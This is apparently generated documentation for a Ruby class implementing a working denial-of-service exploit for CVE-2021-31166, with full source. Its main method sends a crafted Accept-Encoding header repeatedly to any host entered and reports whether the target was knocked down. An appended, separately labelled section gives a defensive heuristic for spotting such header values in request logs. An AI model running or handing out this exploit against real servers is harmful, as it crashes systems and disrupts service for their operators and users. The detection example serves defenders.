class CVE202131166
This class implements methods to exploit CVE-2021-31166 for a DoS (Denial of Service) attack (Blue Screen), written in Ruby.
Public Class Methods
check_up(request, uri)
This function checks the target state
# File CVE-2021-31166.rb, line 90
def self.check_up(request, uri)
  res = Net::HTTP.start(
    uri.hostname, uri.port,
    read_timeout: 60, open_timeout: 60, use_ssl: uri.scheme == 'https'
  ) { |http| http.request(request) }
rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError
  puts '[!] This host is probably inaccessible'
  2
else
  nil
end
get_stdin_host()
This function gets target host from the STDIN
# File CVE-2021-31166.rb, line 82
def self.get_stdin_host
  print 'Host (target): '
  gets.strip
end
main()
The main function to launch the attack
# File CVE-2021-31166.rb, line 107
def self.main
  host = ARGV[0] || get_stdin_host
  uri = URI("http://#{host}")
  request = Net::HTTP::Get.new(uri)

  access_error = check_up(request, uri)
  return access_error if access_error

  request['Accept-Encoding'] = "#{rand(1..7).times.map do
    (0...(rand(2..5))).map do
      ('a'..'z').to_a[rand(26)]
    end.join
  end.join(', ')}, ,"

  vulnerable = false
  10.times do
    Net::HTTP.start(
      uri.hostname, uri.port,
      read_timeout: 10, open_timeout: 10, use_ssl: uri.scheme == 'https'
    ) { |http| http.request(request) }
  rescue Net::OpenTimeout, Errno::ETIMEDOUT
    vulnerable = true
    break
  end

  if vulnerable
    puts "[+] Target: #{host} is vulnerable and down."
    0
  else
    puts "[-] Target: #{host} is not vulnerable and up."
    1
  end
end
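The Accept-Encoding value that main builds is a run of made-up coding names followed by an empty list member (", ,"). The following is an added example, not part of CVE-2021-31166.rb: a heuristic a defender could run over logged Accept-Encoding values to flag that shape. The allow-list, function names, tab-separated log layout and sample lines are assumptions constructed for this example.

```ruby
# Added example, not part of CVE-2021-31166.rb.
# Heuristic check for Accept-Encoding values shaped like the one main builds:
# made-up coding names followed by an empty list member (", ,").

# Content codings commonly sent by real clients (assumed allow-list; extend as needed).
KNOWN_CODINGS = %w[gzip x-gzip deflate compress x-compress br zstd identity *].freeze

# Returns an array of findings for one header value; empty means nothing flagged.
def accept_encoding_findings(value)
  findings = []
  # limit -1 keeps trailing empty fields, which String#split drops by default
  members = value.to_s.split(',', -1).map(&:strip)
  findings << :empty_list_member if members.length > 1 && members.any?(&:empty?)
  # Drop any ";q=..." weight before comparing the coding name
  codings = members.reject(&:empty?).map { |m| m.split(';', 2).first.strip.downcase }
  unknown = codings - KNOWN_CODINGS
  findings << :unknown_coding unless unknown.empty?
  findings
end

# Scans "client_ip<TAB>header value" lines (assumed layout) and returns the flagged ones.
def flag_requests(lines)
  lines.each_with_object([]) do |line, hits|
    client, value = line.chomp.split("\t", 2)
    found = accept_encoding_findings(value)
    hits << { client: client, value: value, findings: found } unless found.empty?
  end
end

# Constructed sample input (documentation IP range), not captured traffic.
SAMPLE_LINES = [
  "192.0.2.10\tgzip, deflate, br",
  "192.0.2.11\tgzip;q=1.0, identity;q=0.5, *;q=0",
  "192.0.2.66\tqwe, zxcv, ab, ,",
  "192.0.2.12\t"
].freeze

if __FILE__ == $PROGRAM_NAME
  flag_requests(SAMPLE_LINES).each do |hit|
    puts "#{hit[:client]} #{hit[:findings].join(',')} #{hit[:value].inspect}"
  end
end
```

An empty list member alone is only a weak signal, since HTTP recipients are expected to tolerate some empty elements; the combination with unknown coding names is what matches the value built above.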